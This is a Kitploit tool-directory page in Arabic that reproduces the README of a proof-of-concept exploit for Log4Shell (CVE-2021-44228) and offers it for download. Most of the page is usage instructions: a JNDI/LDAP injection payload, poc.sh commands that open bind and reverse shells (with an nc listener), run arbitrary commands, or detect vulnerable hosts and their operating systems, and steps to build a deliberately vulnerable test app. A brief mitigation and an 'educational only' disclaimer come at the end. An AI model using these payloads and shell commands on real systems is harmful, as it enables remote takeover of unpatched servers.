Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44228-PoC — استغلال إثبات المفهوم لـ CVE-2021-44228 (Log4Shell) مع خوادم HTTP و LDAP، يدعم القذائف العكسية/المرتبطة و RCE والكشف المستند إلى الوقت للاستخدام التعليمي. | Kitploit
أدوات/GitHubGitHub/thearqsz/cve-2021-44228-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubthearqsz/cve-2021-44228-poc

CVE-2021-44228-PoC

استغلال إثبات المفهوم لـ CVE-2021-44228 (Log4Shell) مع خوادم HTTP و LDAP، يدعم القذائف العكسية/المرتبطة و RCE والكشف المستند إلى الوقت للاستخدام التعليمي.

عرض المستودع
2منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44228 PoC

PoC لـ CVE-2021-44228.

هذا المشروع لأغراض تعليمية فقط.

خادم الاستغلال

هذا المشروع يقوم بإنشاء خادمين: http و ldap. كلاهما ضروري لعمل الاستغلال. يتم تجميع ملف الجافا المحدد وبدء الخوادم في Dockerfile. يتم عرض الحمولة (Payload) للمستخدم - يجب تمريرها إلى التطبيق الضعيف.

مثال على الحمولة:

root@kitploit:~
${jndi:ldap//127.0.0.1:1389/a}

كيفية التشغيل؟

  • Bind shell
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e bind --remote-port 4445
  • Reverse shell
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e reverse --listener-port 4444
  • RCE
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e rce --cmd 'ls | tee log.txt'
  • الكشف عن الثغرات المعتمد على الوقت

يقوم البرنامج بالتوقف لمدة 25 ثانية

root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e vulndetect
  • كشف نظام التشغيل
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e osdetect --listener-port 4444

قد يعيد كشف نظام التشغيل 4 أحرف:

  • L لنظام لينكس
  • W لنظام ويندوز
  • M لنظام ماك
  • U لنظام غير معروف

تجاوز

تم نشر تقنية التجاوز. مثال هنا

التطبيق الضعيف

تم تصميم التطبيق لإظهار كيفية عمله. لبناء وتشغيل ملف jar مع التطبيق استخدم:

root@kitploit:~
./build_vuln_app.sh
java -jar vulnapp/target/vulnapp.jar 'PAYLOAD'

حيث PAYLOAD هو الناتج من سكريبت ./poc.sh (مثل ${jndi:ldap://127.0.0.1:1389/1}).

الشكر والتقدير

بعض الشكر للمشاريع والمواقع التي استخدمت أثناء إنشاء هذا الاستغلال:

  • https://github.com/shanfenglan/apache_log4j_poc
  • https://github.com/ivan-sincek/java-reverse-tcp
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/RandomRobbieBF/marshalsec-jar

كيف تحمي نفسك؟

ابدأ التطبيق باستخدام log4j مع تعيين log4j2.formatMsgNoLookups إلى true، أو قم بالتحديث إلى log4j-2.15.0-rc1 أو أحدث. التحديثات متاحة - قم بتطبيقها في أسرع وقت ممكن.

إخلاء مسؤولية

هذا المشروع يمكن استخدامه فقط للأغراض التعليمية. استخدام هذا البرنامج ضد الأنظمة المستهدفة دون إذن مسبق غير قانوني، وأي أضرار ناتجة عن سوء استخدام هذا البرنامج لن تكون مسؤولية المؤلف.

تنزيل الأداة